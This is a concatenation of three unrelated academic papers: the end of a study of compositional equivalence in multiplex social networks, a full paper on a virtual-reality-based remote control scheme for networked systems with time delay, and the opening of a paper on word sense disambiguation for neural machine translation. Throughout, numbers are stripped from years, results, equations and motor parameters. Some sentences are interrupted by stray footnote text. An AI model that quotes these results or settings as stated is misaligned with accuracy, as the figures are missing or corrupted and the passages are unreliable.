marriage ties with wealth in the analysis. in this case the class system of actors takes the levels given in the hasse diagram of figure with wealth. the positional system in this case implies that the marriage ties do not follow a particular pattern in the role structure, whereas business ties and wealth role relations follow a core-periphery structure as shown in the matrices below: business marriage wealth there are no ambiguities in the categorisation of actors in the banking network with the financial wealth of the actors, which leads to a univocally substantial interpretation of the role structure for this positional system. however, the main advantage with these generators is that the role structure gets smaller than with the previous two settings, allowing a more transparent interpretation of the role interlock, even though we are aware that a different logic may arise in the role structure when considering the number of priorates. 
the reader can refer to ostoic ( a) for an extended analysis of the role structure and role interlock of this particular network. discussion the structuring effect of attribute-based information in the reduction of multiplex networks constituted the most significant aspect covered in this paper, where one of the main challenges has been preserving the multiplicity of the different types of tie. in this sense, the notion of compositional equivalence defined by breiger and pattison ( ) allows us to reduce the besides, assigning strozzi in the central class does not affect the role structure at all. network structure without dropping the relational differentiation, and we extend the positional analysis to non-ascribed characteristics of the actors in the network, which are included as generator relations in the form of diagonal matrices. there is a strong belief that attribute-based information enriches the substantial interpretation of the relational structure of the network, and this is so irrespective of whether the relational system is in a reduced or full format. even though the reduction of the network can bring some ambiguities, aggregated structures are more manageable for substantial interpretation of the relational logic in multiplex network structures, which are complex systems by definition. ce has proven to be a valuable option for mid-sized networks; however, theoretical guidance is required both for the selection of the attribute types and for the establishment of the positional system and subsequent role structure. there are still some important issues that need to be accounted for. the first concern deals with directed multiplex networks, in which the application of ce typically requires counting with relational contrast reflected in the transpositions of the ties. a second aspect is the rationale behind relational structures, which is expressed by algebraic constraints governing the system, including sets of equations among strings, hierarchy in the relations, and interrelations between the different types of tie occurring in the network. these aspects are mentioned only briefly here and their treatment is out of the scope of this article. finally, a statistical approach to the modelling is required for larger network structures, and statistical methods for multiplex networks can serve to complement the modelling process either in an early stage of the analysis or by providing relational and role structures having both fixed and random effects with attributes. connections compositional equivalence | volume | issues & | insna.org references boorman, s.a. & white, h.c. ( ). social structure from multiple networks. ii. role structures. amer- ican journal of sociology, ( ), - . breiger, r.l. & pattison, p.e. ( ). cumulated so- cial roles: the duality of persons and their alge- bras. social networks, ( ), - . doreian, p., batagelj, v. & ferligoj, a. ( ). parti- tioning networks based on generalized concepts of equivalence. journal of mathematical sociology, ( ), - . doreian, p., batagelj, v. & ferligoj, a. ( ). gen- eralized blockmodeling. cambridge: cambridge university press everett, m. g. ( ). role similarity and complexity in social networks. social networks, ( ), - . fruchterman, t.m.j. & reingold, e.m. ( ). graph- drawing by force-directed placement. journal of software: practice & experience, ( ), - . hansen, k. et al. ( ). rgraphviz: provides plotting capabilities for r graph objects. r package version . . 
available at: https://www.bioconductor.org/packages/release/bi oc/html/rgraphviz.html kent, d.v. ( ). the rise of the medici: faction in florence, – . oxford: oxford university press. lorrain, f. & white, h.c. ( ). structural equiva- lence of individuals in social networks. journal of mathematical sociology, ( ), - . ostoic, j.a.r. ( a). algebraic analysis of multi- plex, signed, and affiliation networks. forthcom- ing. new york: john wiley & sons. ostoic, j.a.r. ( b). multigraph: plot and manipu- late multigraphs.r package version . available at: https://cran.r- project.org/package=multigraph ostoic, j.a.r. ( c). multiplex: algebraic tools for the analysis of multiple social networks. r pack- age version . available at: https://cran.r- project.org/package=multiplex padgett, j.f. & ansell, c.k. ( ). robust action and the rise of the medici, – . american journal of sociology, ( ), - . pattison, p.e. ( ) algebraic models for social networks. structural analysis in the social sci- ences. cambridge: cambridge university press. sailer, l. d. ( ). structural equivalence: meaning and definition, computation and application. social networks, ( ), - . wasserman, s. & faust, k. ( ). social network analysis: methods and applications. structural analysis in the social sciences. cambridge: cam- bridge university press. white, d.r. & reitz, k.p. ( ). graph and semi- group homomorphisms on networks of relations. social networks, ( ), - . winship, c. & mandel, m.j. ( ). roles and posi- tions: a critique and extension of the blockmodel- ing approach. sociological methodology, , - . international conference on sensor network and computer engineering (icsnce ) the remote control system based on the virtual reality su xiaohui school of computer science and engineering, xi’an technological university, xi’an china e-mail: @qq.com dong qiyu school of computer science and engineering, xi’an technological university, xi’an china huang mengyao school of computer science and engineering, xi’an technological university, xi’an china xu shuping school of computer science and engineering, xi’an technological university, xi’an china abstract—aiming at the issues of random delay and delay uncertainty of the control information network, a kind of network remote closed-loop control structure based on virtual reality simulation is proposed. the method in accordance with the idea of open-loop system to achieve closed-loop control make the influence of network latency excluded real-time little closed-loop control system of controlled object value and no effect on the characteristics of the controlled object. simulation results show that the structure of the remote control system has good dynamic quality and reduce the impact of network delay aspects to the system dynamics characteristics. it is a reference idea to the remote real-time closed-loop control. keywords-virtual reality; network time-delay; remote control i. introduction the network control system is the extension of the control distance, the long-distance transmission of control signals will inevitably bring about the delay of the signal [ - ]. 
a remote control system that uses the internet, with the tcp/ip protocol as the means of information transfer, can achieve the goal of controlling equipment connected to any node of the internet at any time and in any place [ - ]. a remote control system based on a control information network in effect pulls the two ends of a control system apart, with the controller and the controlled object exchanging information across a computer network; in such a system the basic requirements of the control system do not change, only the difficulty of control increases [ ]. experiments show that information transfer over the internet produces a fairly large delay that is also uncertain, which seriously degrades the control quality of the entire system; this is a bottleneck for the development of internet-based remote control technology [ ].

in order to relieve the impact of network latency on system performance, new control concepts must be sought from the basic principles of the control system. an open, interactive, and realistic virtual environment created by virtual reality technology immerses people in virtual reality so that they can make decisions about changes in the environment on the basis of what the virtual environment presents, and in turn act on that virtual environment [ ]. in a 'real' virtual environment the input is one set of virtual parameters and the output is another, the two linked according to a set relationship, and the operator can respond to the input parameters in a timely manner. because the technology offers good 'reality' and is 'forward-looking', this paper applies virtual reality simulation to network remote control structures and, in accordance with the idea of achieving closed-loop control through an open-loop arrangement, removes the influence of network latency from the real-time closed loop on the controlled variable. this effectively weakens the impact of network latency on the performance of the entire control system.

ii. the three closed-loop remote control structures based on virtual reality technology
a. system architecture
the transmission delay of the network introduces a time lag between the remote operations and the controlled object, so there is a difference between the parameters the operations can be based on and the parameters they need to be based on, which affects decision-making accuracy and the effectiveness of instructions. as shown in figure , a virtual operating environment can be built for the remote operator by means of a simulation model of the actual controlled object and its control parameters. in this environment the simulated controlled object is located at the remote client, with no network transmission delay between it and the remote operator, so the operator can operate the simulated controlled object in real time. at the same time, the control signals γ(k−1), γ(k), γ(k+1), … imposed on the simulated controlled object are delivered to the actual controlled object over the internet, and the actual status information y(k−1), y(k), y(k+1), … of the controlled object is continually taken back and compared in real time with the state of the simulated controlled object, in order to monitor the running state of the actual controlled object.
the network delay affects every transferred datum with a similar lag, so with appropriate buffering the data flow can be kept continuous: the control signals acting on the actual controlled object and the status signals taken back from it both remain continuous streams, achieving real-time closed-loop control of the actual controlled object.

figure : structural diagram of the virtual reality environment (simulated controlled object and remote operator on one side, the actual controlled object on the other, exchanging γ(k) and y(k) over the internet).

network latency limits remote real-time control. how to reflect the actual running state of the system 'realistically' by means of the system model, and how the operator develops and issues control commands according to this 'real' virtual environment, is the target of applying virtual reality technology to remote control.

b. application examples of the virtual simulation environment
in order to describe the application background of virtual reality simulation clearly, figure gives an application example based on the virtual simulation environment. the left half of the figure is the virtual simulation environment created for the remote operator following the virtual reality idea, including a display part and a control panel part. of course, this is a simple virtual reality environment; obviously, all the advantages of the technology can be used to create more complex virtual reality with better functions, allowing operators to enter the scene and making it easier for them to judge and operate. the operating handle in the control panel of the figure is only schematic and is mainly used to describe a remote control method based on the virtual reality simulation environment.

as shown in figure , the schematic is a system for target tracking and engagement using a game controller on the control panel (a handle that can be moved, on the right of the control panel), launch buttons (two buttons on the left of the control panel), and the control object in the operation display interface. first of all, the system associates the control object and the target in the virtual reality with
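the buffering idea mentioned above can be pictured as a simple playout buffer: samples that arrive with variable network delay are released at a fixed hold-back behind their source times so that the stream stays continuous. this is an illustrative python sketch with invented timings, not the scheme implemented in the paper's simulink model.

import heapq
import random

def playout(samples, delays, holdback):
    # re-time samples that arrive after variable delays so that they are
    # consumed as a continuous stream, holdback seconds behind real time
    arrivals = [(t + d, t, v) for (t, v), d in zip(samples, delays)]
    heapq.heapify(arrivals)
    released = []
    while arrivals:
        arrive, t_src, value = heapq.heappop(arrivals)
        release = max(arrive, t_src + holdback)   # never earlier than the schedule
        released.append((release, t_src, value))
    return released

random.seed(1)
period = 0.01                                     # 10 ms control period (hypothetical)
samples = [(k * period, f"y({k})") for k in range(10)]
delays = [random.uniform(0.02, 0.06) for _ in samples]  # variable network delay
for release, t_src, value in playout(samples, delays, holdback=0.08):
    print(f"{value} produced at {t_src:.2f} s, played out at {release:.2f} s")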
iii. the three closed-loop control structure of the virtual simulation environment

because of the network delay, the dialogue between the remote operator and the controlled object has a time lag. to obtain both a good response of the controlled object and real-time closed-loop control by the remote operator, a three closed-loop remote control system based on virtual reality simulation is proposed on the concept of virtual reality. the two ends, the operating side and the controlled-object side, each build an independent closed loop on the controlled value; these are the two ends of the dumbbell structure shown as dashed boxes in figure , and they provide real-time closed-loop control of the controlled value for the actual controlled object and for the virtual simulated object respectively. the two ends, located on the operating side and the object side, are connected through the internet as the dumbbell handle, a big closed loop containing the network delay; together these form a dumbbell-shaped three closed-loop structure. the small closed loops at the two ends of the dumbbell can run independently under the operator's instructions, and their commands and results are communicated through the big closed loop in the middle, the dumbbell handle, so that the information of the two small closed-loop systems at the ends can be compared, exchanged and updated.

clearly, in this structure the small closed loops at the ends of the dumbbell contain no network delay links and can run independently, so they respond quickly to the controlled value. the big closed loop of the dumbbell handle, which contains the delay links, can use the parameters of the actual controlled object at one end of the structure to continuously correct, according to the parameter variations at both ends, the running parameters and state of the virtual simulation system at the other end, so that the running state of the simulation system and of the actual system become similar or even identical. meanwhile the operator decides the next control instruction from the running state of the virtual simulation at one end of the dumbbell structure, judges from the running results of both ends whether the simulated object and the actual object agree, and judges whether the actual system is running normally in the desired way. therefore, in the three closed-loop remote control system the operator can give the required control instructions on the basis of the virtual simulation system and ultimately achieve remote real-time control.

evidently, the key to the system is how to create the virtual closed-loop architecture and the network delay model: a closed-loop control system of the practical controlled object and its parameters must be established, and at the same time another model of the controlled object must be established as the virtual "real" controlled object. the remote controller is then "immersed" in the virtual reality of this controlled-object model and operates the model in virtual reality, while the operating instructions are sent to the actual controlled object, so that real-time remote control of the controlled object is achieved.
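a compact sketch of the correction performed by the dumbbell handle follows (python; the shared first-order dynamics, the delays and the correction gain are assumed values, not the paper's): the virtual model runs a fast local loop without delay, and each delayed measurement arriving from the actual object nudges the virtual state back toward the real one.

```python
from collections import deque

DT, DELAY = 0.01, 20          # sample period and one-way delay in samples (assumed)
CORRECTION_GAIN = 0.1         # strength of the delayed-feedback correction (assumed)

def step(y, u):
    """shared stand-in dynamics for the virtual model and the actual object."""
    return y + DT * (-1.5 * y + 1.5 * u)

link_down = deque([0.0] * DELAY)   # operator -> actual object
link_up = deque([0.0] * DELAY)     # actual object -> operator

y_virtual, y_actual, setpoint = 0.0, 0.2, 1.0   # deliberate initial mismatch

for k in range(600):
    u = 2.0 * (setpoint - y_virtual)            # small closed loop at the operator end
    y_virtual = step(y_virtual, u)

    link_down.append(u)
    y_actual = step(y_actual, link_down.popleft())   # delayed command reaches the object

    link_up.append(y_actual)
    y_meas = link_up.popleft()                       # delayed measurement comes back
    # big closed loop ("dumbbell handle"): pull the virtual state toward reality
    y_virtual += CORRECTION_GAIN * (y_meas - y_virtual)

print(f"final mismatch between virtual and actual state: {abs(y_virtual - y_actual):.4f}")
```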
to achieve real-time control, the state of the actual system must be fed back into the virtual reality, so that the controller can not only operate in real time on the object model in the virtual reality but can also constantly monitor and compare the actual running state of the actual controlled object, in order to understand whether the dumbbell-shaped three closed-loop remote control system is running normally and whether the small closed loops at the two ends of the dumbbell keep pace with each other, and to take the necessary measures according to this result. therefore, the key points of the structure are to predict the network delay accurately and to establish the controlled-object model accurately.

figure . dumbbell-shaped three closed-loop structure diagram of the remote control system (the remote control terminal with its controller, the virtual charged-object model, delay prediction and comparison of predicted and actual outputs; the network delay links; and the controller and actual charged object at the far end).

iv. virtual charged object modeling and simulation

a remote-control virtual simulation environment for a brushless dc motor, shown in figure , is built with the m-functions and simulink simulation modules provided with matlab. the brushless dc motor model is the one provided in the matlab standard library. because of the large air gap, rotor and stator flux saturation is ignored and the magnetic flux is treated as a linear function; the motor is operated in two-phase-conduction, star-connected, three-phase six-state mode. its mathematical model in the abc phase plane is [ - ]:

$\frac{d i_a}{dt} = \frac{1}{3 l_s}\left[\,2 v_{ab} + v_{bc} - 3 r_s i_a + p\,\psi\,(-2\varphi'_a + \varphi'_b + \varphi'_c)\,\right]$

$\frac{d i_b}{dt} = \frac{1}{3 l_s}\left[\,-v_{ab} + v_{bc} - 3 r_s i_b + p\,\psi\,(\varphi'_a - 2\varphi'_b + \varphi'_c)\,\right]$

$\frac{d i_c}{dt} = -\left(\frac{d i_a}{dt} + \frac{d i_b}{dt}\right)$

$t_e = p\,\psi\,(\varphi'_a i_a + \varphi'_b i_b + \varphi'_c i_c)$

where $l_s$ is the stator coil inductance, $r_s$ the stator coil resistance, $i_a$, $i_b$, $i_c$ the a, b, c phase currents, $\varphi'_a$, $\varphi'_b$, $\varphi'_c$ the a, b, c phase back electromotive forces, $v_{ab}$, $v_{bc}$ the line voltages between ab and bc, $\omega$ the rotor angular velocity, $\psi$ the amplitude of the flux generated by the rotor permanent magnets at the stator, $p$ the number of pole pairs, and $t_e$ the electromagnetic torque. the mechanical equations are

$j\,\frac{d\omega}{dt} = t_e - f\,\omega - t_m, \qquad \frac{d\theta}{dt} = \omega$

where $j$ is the total moment of inertia of rotor and load, $f$ the total viscous friction coefficient of rotor and load, and $t_m$ the mechanical torque on the shaft.

figure . schematic diagram of the brushless dc motor virtual simulation system.

the network delay is set randomly to . seconds and the motor parameters are set as follows: rs ( . ohm), ls ( . e- h), flux ( . wb), top width of the trapezoidal back-emf ( °), moment of inertia j ( . e- ), friction coefficient f ( e- ), and pole pair number p ( ). with the network delay set to . seconds and the small closed-loop delay to . seconds, a step input is applied at t = . seconds and a load torque tm of n·m is added at t = . seconds; the simulation is then run and the result is shown in figure . to learn more about the transmission delay of the network, its impact on the two ends of the dumbbell-shaped virtual simulation environment is analyzed as shown in figure . it is assumed that the simulated controlled object and the actual controlled object are exactly the same, so the model of figure also represents both the simulated and the actual controlled object.
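a rough numerical sketch of such a simulation is shown below (python; a deliberately simplified dc-motor stand-in replaces the full abc-frame bldc model, and every numeric constant, including the delay, the step time and the load torque, is a placeholder rather than a value from the paper):

```python
from collections import deque

# placeholder motor constants (illustrative only, not the paper's settings)
R, L, KE, KT = 0.5, 1e-3, 0.05, 0.05   # resistance, inductance, back-emf and torque constants
J, F = 1e-4, 1e-5                      # inertia and viscous friction
DT = 1e-4                              # integration step in seconds
NET_DELAY = int(0.02 / DT)             # assumed one-way network delay of 0.02 s

def motor_step(i, w, v, t_load):
    """simplified single-axis motor model standing in for the abc-frame bldc equations."""
    di = (v - R * i - KE * w) / L
    dw = (KT * i - F * w - t_load) / J
    return i + DT * di, w + DT * dw

link = deque([0.0] * NET_DELAY)        # delayed command channel
i, w = 0.0, 0.0
w_ref, t_load = 0.0, 0.0

for k in range(int(0.5 / DT)):
    t = k * DT
    if t >= 0.05:
        w_ref = 100.0                  # step speed reference (placeholder value)
    if t >= 0.25:
        t_load = 0.02                  # load torque applied later (placeholder value)

    # a speed controller acting on the local virtual model would sit here; for
    # brevity the remote motor is driven directly through the delayed link
    v_cmd = 0.05 * (w_ref - w)
    link.append(v_cmd)
    i, w = motor_step(i, w, link.popleft(), t_load)

print(f"speed at the end of the run: {w:.1f} rad/s")
```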
with a step function as input, the delay links "delay " and "delay " are set to values of and . seconds respectively, where the latter is the delay within the small closed-loop system and is set to . seconds; after running the simulation, the results shown in figure are obtained. figure a shows the control command r issued by the operator (thin straight line) acting directly on the controlled object without delay, the output out of the controlled object (dotted line) without delay, and out (thick solid line) as the delayed output. figure b shows the control command r issued by the operator acting on the controlled object after the delay, the output out of the controlled object (dotted line) without further delay, and out (thick solid line) as the output delayed once more. here r and out denote the input and output of the simulated controlled object, r_n and out_n denote the input and output of the actual controlled object, and the artificially delayed outputs are included so that the outputs of the simulated and the actual object can be compared in figure .

figure . impact of the delay links on the system input and output: (a) response curve without delay; (b) response curve with the input delayed.

figure a shows the speed input r of the speed small closed loop at one end of the dumbbell structure, which contains no network delay (thin straight line), the response out (dotted line), and the response out after transmission through the closed loop with network delay (thick solid line). figure b shows the speed input r set at the other end of the dumbbell structure after passing through the big closed loop with network delay (thin straight line), the response out of the system to this input (dotted line), and the response out after the network closed-loop transmission delay (thick solid line). the one-way network delay is . seconds; in the simulation the delay value can be set by hand, and it can of course also be predicted by the radial basis function network delay model.

v. conclusion

taking the networked closed-loop system with a human controller as the object of study, and combining human characteristics with the requirements of networked closed-loop control systems, a network remote closed-loop control method based on virtual reality simulation was proposed. in this control structure, the idea of achieving closed-loop control by way of an open-loop arrangement excludes the impact of the network delay on the real-time closed loop of the controlled value without affecting the characteristics of the controlled object; the remote simulation of the charged object based on virtual reality gives fast, real-time remote control of the object a foundation; and the virtual reality simulation system is itself constantly updated according to changes in the actual environment, which ensures that remote control based on the virtual reality retains a certain authenticity. simulation results show that a remote control system with this structure has good dynamic quality and reduces the impact of the network delay links on the system dynamics, which provides a reference idea for remote real-time closed-loop control.

acknowledgment

the authors wish to thank the cooperators. this research is partially funded by the project funds of the shaanxi province department of education ( jk ).

references
[ ] du dajun, fen minrui, song yang, et al. brief review and prospects of networked control systems [j]. chinese journal of scientific instrument, , ( ): - .
[ ] wang xu, wang zhongjie. design of embedded network control system based on tcp/ip protocol stack [j]. system simulation technology, , ( ): - .
[ ] zhou zude, chen benyuan, et al. research of networked control system time delay distribution [j]. control and decision, , ( ): - .
[ ] guan shou-ping, ying ting. network control system predictive control based on pole placement and time delay error compensation [j]. information and control, , ( ): - .
[ ] yang yunhang, li zhizhong, dong wei, et al. missile repair training system based on virtual reality [j]. acta armamentarii, , ( ): - .
[ ] zhuang yah, wang wei, yun wei-ming. the research and development of network based robot control technology [j]. robot, , ( ): - .
[ ] huang j q, lewis f l, liu k a. neural predictive control for telerobots with time delay [j]. journal of intelligent and robotic systems, , : - .
[ ] chen s, cowan c f n, grant p m. orthogonal least squares learning algorithm for radial basis function networks. ieee transactions on neural networks, , vol. ( ): - .
[ ] kanayama y, miyake n. trajectory generation for mobile robots. robotics research, the mit press, vol. , , pp. - .
[ ] zhou yuanshen. ac and dc speed control system and matlab simulation [m]. beijing: china electric power press.

integrating weakly supervised word sense disambiguation into neural machine translation

xiao pu (nuance communications, xiao.pu@nuance.com; work conducted while at the idiap research institute), nikolaos pappas (idiap research institute, nikolaos.pappas@idiap.ch), james henderson (idiap research institute, james.henderson@idiap.ch), andrei popescu-belis (heig-vd / hes-so, andrei.popescu-belis@heig-vd.ch)

abstract

this paper demonstrates that word sense disambiguation (wsd) can improve neural machine translation (nmt) by widening the source context considered when modeling the senses of potentially ambiguous words. we first introduce three adaptive clustering algorithms for wsd, based on k-means, chinese restaurant processes, and random walks, which are then applied to large word contexts represented in a low-rank space and evaluated on semeval shared-task data. we then learn word vectors jointly with sense vectors defined by our best wsd method, within a state-of-the-art nmt system. we show that the concatenation of these vectors, and the use of a sense selection mechanism based on the weighted average of sense vectors, outperforms several baselines including sense-aware ones. this is demonstrated by translation on five language pairs. the improvements are more than bleu point over strong nmt baselines, + % accuracy over all ambiguous nouns and verbs, or + % when scored manually over several challenging words.

introduction

the correct translation of polysemous words remains a challenge for machine translation (mt). although some translation options may be interchangeable, substantially different senses of source words must generally be rendered by different words in the target language. hence, an mt system should identify, implicitly or explicitly, the correct sense conveyed by each occurrence in order to generate an appropriate translation.
for instance, in the following sentence from europarl, the translation of "deal" should convey the sense "to handle" (in french traiter) and not "to cope" (in french remédier, which is wrong):

source: how can we guarantee the system of prior notification for high-risk products at ports that have the necessary facilities to deal with them?
reference translation: comment pouvons-nous garantir le système de notification préalable pour les produits présentant un risque élevé dans les ports qui disposent des installations nécessaires pour traiter ces produits ?
baseline neural mt: [. . .] les ports qui disposent des moyens nécessaires pour y remédier ?
sense-aware neural mt: [. . .] les ports qui disposent des installations nécessaires pour les traiter ?

current mt systems perform word sense disambiguation implicitly, based on co-occurring words in a rather limited context. in phrase-based statistical mt, the context size is related to the order of the language model (often between and ) and to the length of n-grams in the phrase table (seldom above ). in attention-based neural mt (nmt), the context extends to the entire sentence, but multiple word senses are not modeled explicitly. the implicit sense information captured by word representations used in nmt leads to a bias in the attention mechanism towards dominant senses. therefore, the nmt decoders cannot clearly identify the contexts in which one word sense should be used rather than another one. hence, although nmt can use local constraints to translate "great rock band" into french as superbe groupe de rock rather than grande bande de pierre, thus correctly assigning the musical rather than geological sense to "rock", it fails to do so for word senses that require larger contexts.

in this paper, we demonstrate that the explicit modeling of word senses can be helpful to nmt by using combined vector representations of word types and senses, which are inferred from contexts that are larger than that of state-of-the-art nmt systems. we make the following contributions:

• weakly supervised word sense disambiguation (wsd) approaches integrated into nmt, based on three adaptive clustering methods and operating on large word contexts.
• three sense selection mechanisms for integrating wsd into nmt, respectively based on top, average, and weighted average (i.e., attention) of word senses.
• consistent improvements against baseline nmt on five language pairs: from english (en) into chinese (zh), dutch (nl), french (fr), german (de), and spanish (es).

the paper is organized as follows. in § , we present three adaptive wsd methods based on k-means clustering, the chinese restaurant process, and random walks. in § , we present three sense selection mechanisms that integrate the word senses into nmt. the experimental details appear in § , and the results concerning the optimal parameter settings are presented in § , where we also show that our wsd component is competitive on the semeval shared task. § presents our results: the bleu scores increase by about point with respect to a strong nmt baseline, and the accuracy of ambiguous noun and verb translation improves by about %, while a manual evaluation of several challenging and frequent words shows an improvement of about %.
a discussion of related work appears finally in § .

adaptive sense clustering for mt

in this section, we present the three unsupervised or weakly supervised wsd methods used in our experiments, which aim at clustering different occurrences of the same word type according to their senses. we first consider all nouns and verbs in the source texts that have more than one sense in wordnet, and extract from there the definition of each sense and, if available, the example. for each occurrence of such nouns or verbs in the training data, we use word2vec to build word vectors for their contexts (i.e., neighboring words). all vectors are passed to an unsupervised clustering algorithm, possibly instantiated with wordnet definitions or examples. the resulting clusters can be numbered and used as labels, or their centroid word vector can be used as well, as explained in § .

this approach answers several limitations of previous supervised or unsupervised wsd methods. on the one hand, supervised methods require data with manually sense-annotated labels and are thus limited to typically small subsets of all word types—for example, up to one hundred content words targeted in semeval (manandhar et al., ; www.cs.york.ac.uk/semeval _wsi) and up to a thousand words in semeval (moro and navigli, ). in contrast, our method does not require labeled texts for training, and applies to all word types with multiple senses in wordnet (e.g., nearly , for some data sets; see table later in this paper). on the other hand, unsupervised methods often predefine the number of possible senses for all ambiguous words before clustering their occurrences, and do not adapt to what is actually observed in the data; as a result, the senses are often too fine-grained for the needs of mt, especially for a particular domain. in contrast, our model learns the number of senses for each analyzed ambiguous word directly from the data.

definitions and notations

for each noun or verb type wt appearing in the training data, as identified by the stanford pos tagger (nlp.stanford.edu/software), we extract the senses associated to it in wordnet (fellbaum, ; wordnet.princeton.edu) using nltk (www.nltk.org/howto/wordnet.html). specifically, we extract the set of definitions $d_t = \{d_{tj} \mid j = 1, \ldots, m_t\}$ and the set of examples of use $e_t = \{e_{tj} \mid j = 1, \ldots, n_t\}$, each of them containing multiple words. most of the senses are accompanied by a definition, but only about half of them also include an example of use.

definitions dtj and examples etj are represented by vectors defined as the average of the word embeddings over all the words constituting them (except stopwords). formally, these vectors are $d_{tj} = \big(\sum_{w_l \in d_{tj}} w_l\big) / |d_{tj}|$ and $e_{tj} = \big(\sum_{w_l \in e'_{tj}} w_l\big) / |e'_{tj}|$, respectively, where $|d_{tj}|$ is the number of tokens of the definition. although the entire definition dtj is used to build the dtj vector, we do not consider all words in the example etj, but limit the sum to a fragment e′tj contained in a window of size c centered around the considered word, to avoid noise from long examples. hence, we divide by the number of words in this window, noted |e′tj|. all of these word vectors wl are pre-trained word2vec embeddings from google (mikolov et al., ; code.google.com/archive/p/word vec/). if dim is the dimensionality of the word vector space, then all vectors wl, dtj, and etj are in $\mathbb{r}^{dim}$.
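a minimal sketch of this extraction and averaging step is given below (python; nltk's wordnet interface is used as in the paper, while the `vec` lookup is a random stand-in for the pre-trained word2vec embeddings, and the stopword list and window handling are simplified assumptions):

```python
import numpy as np
from nltk.corpus import wordnet as wn

DIM = 300
STOP = {"the", "a", "an", "of", "to", "in", "and", "or", "is", "are"}

# stand-in for the pre-trained word2vec lookup: any word -> a vector in R^DIM
rng = np.random.default_rng(0)
emb = {}
def vec(word):
    return emb.setdefault(word, rng.normal(size=DIM))

def avg_vector(words):
    """average embedding of the non-stopword tokens (zero vector if none remain)."""
    toks = [w.lower() for w in words if w.lower() not in STOP]
    if not toks:
        return np.zeros(DIM)
    return np.mean([vec(w) for w in toks], axis=0)

def sense_vectors(lemma, pos=wn.NOUN, window=8):
    """return (sense name, definition vector, example vector or None) per WordNet sense."""
    senses = []
    for syn in wn.synsets(lemma, pos=pos):
        d_vec = avg_vector(syn.definition().split())
        e_vec = None
        if syn.examples():
            ex = syn.examples()[0].split()
            # keep only a window of `window` words centred on the target word, if present
            idx = next((i for i, w in enumerate(ex) if lemma in w.lower()), len(ex) // 2)
            e_vec = avg_vector(ex[max(0, idx - window // 2): idx + window // 2 + 1])
        senses.append((syn.name(), d_vec, e_vec))
    return senses

print([name for name, _, _ in sense_vectors("rock")])
```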
each definition vector dtj or example vector etj for a word type wt is considered as a center vector for each sense during the clustering procedure. turning now to tokens, each word occurrence wi in a source sentence is represented by the average vector ui of the words from its context, that is, a window of c words centered on wi, c being an even number. we calculate the vector ui for wi by averaging vectors from c/2 words before wi and from c/2 words after it. we stop nevertheless at the sentence boundaries, and filter out stopwords before averaging.

clustering word occurrences by sense

we adapt three clustering algorithms to our needs for wsd applied to nmt. the objective is to cluster all occurrences wi of a given word type wt, represented as word vectors ui, according to the similarity of their senses, as inferred from the similarity of the context vectors. we compare the algorithms empirically in § .

k-means clustering. the original k-means algorithm (macqueen, ) aims to partition a set of items, which are here tokens $w_1, w_2, \ldots, w_n$ of the same word type wt, represented through their embeddings $u_1, u_2, \ldots, u_n$ where $u_i \in \mathbb{r}^{dim}$. the goal of k-means is to partition (or cluster) these vectors into k sets $s = \{s_1, s_2, \ldots, s_k\}$ so as to minimize the within-cluster sum of squared distances to each centroid µi:

$s = \arg\min_{s} \sum_{i=1}^{k} \sum_{u \in s_i} \lVert u - \mu_i \rVert^2$

at the first iteration, when there are no clusters yet, the algorithm selects k random points as centroids of the k clusters. then, at each subsequent iteration t, the algorithm calculates for each candidate cluster a new centroid of the observations, defined as their average vector, as follows:

$\mu_i^{t+1} = \frac{1}{|s_i^t|} \sum_{u_j \in s_i^t} u_j$

in an earlier application of k-means to phrase-based statistical mt, but not neural mt, we made several modifications to the original k-means algorithm to make it adaptive to the word senses observed in training data (pu et al., ). we maintain these changes and summarize them briefly here. the initial number of clusters kt for each ambiguous word type wt is set to the number of its senses in wordnet, either considering only the senses that have a definition or those that have an example. the centroids of the clusters are initialized to the vectors representing the senses from wordnet, either using their definition vectors dtj or their example vectors etj. these initializations are thus a form of weak supervision of the clustering process. finally, and most importantly, after running the k-means algorithm, the number of clusters for each word type is reduced by removing the clusters that contain fewer than tokens and assigning their tokens to the closest large cluster. "closest" is defined in terms of the cosine distance between ui and their centroids. the final number of clusters thus depends on the observed occurrences in the training data (which are the same data as for mt), and avoids modeling infrequent senses that are difficult to translate anyway. when used in nmt, in order to assign each new token from the test data to a cluster (i.e., to perform wsd), we select the closest centroid, again in terms of cosine distance.

chinese restaurant process. the chinese restaurant process (crp) is an unsupervised method considered as a practical interpretation of a dirichlet process (ferguson, ) for non-parametric clustering. in the original analogy, each token is compared to a customer in a restaurant, and each cluster is a table where customers can be seated. a new customer can choose to sit at a table with other customers, with a probability proportional to the numbers of customers at that table, or sit at a new, empty table. in an application to multisense word embeddings, li and jurafsky ( ) proposed that the probability to "sit at a table" should also depend on the contextual similarity between the token and the sense modeled by the table. we build upon this idea and bring several modifications that allow for an instantiation with sense-related knowledge from wordnet, as follows.

for each word type wt appearing in the data, we start by fixing the maximal number kt of senses or clusters as the number of senses of wt in wordnet. this avoids an unbounded number of clusters (as in the original crp algorithm) and the risk of cluster sparsity by setting a non-arbitrary limit based on linguistic knowledge. moreover, we define the initial centroid of each cluster as the word vector corresponding either to the definition dtj of the respective sense, or alternatively to the example etj illustrating the sense. for each token wi and its context vector ui, the algorithm decides whether the token is assigned to one of the sense clusters sj to which previous tokens have been assigned, or whether it is assigned to a new empty cluster, by selecting the option that has the highest probability, which is computed as follows:

$p \propto \begin{cases} n_j \big(\lambda_1\, s(u_i, d_{tj}) + \lambda_2\, s(u_i, \mu_j)\big) & \text{if } n_j \neq 0 \ \text{(non-empty sense)} \\ \gamma\, s(u_i, d_{tj}) & \text{if } n_j = 0 \ \text{(empty sense)} \end{cases}$

in other words, for a non-empty sense, the probability is proportional to the popularity of the sense (number of tokens it already contains, nj) and to the weighted sum of two cosine similarities s(·, ·): one between the context vector ui of the token and the definition of the sense dtj, and another one between ui and the average context vector of the tokens already assigned to the sense (µj). these terms are weighted by the two hyper-parameters λ1 and λ2. for an empty sense, only the second term is used, weighted by the γ hyper-parameter.

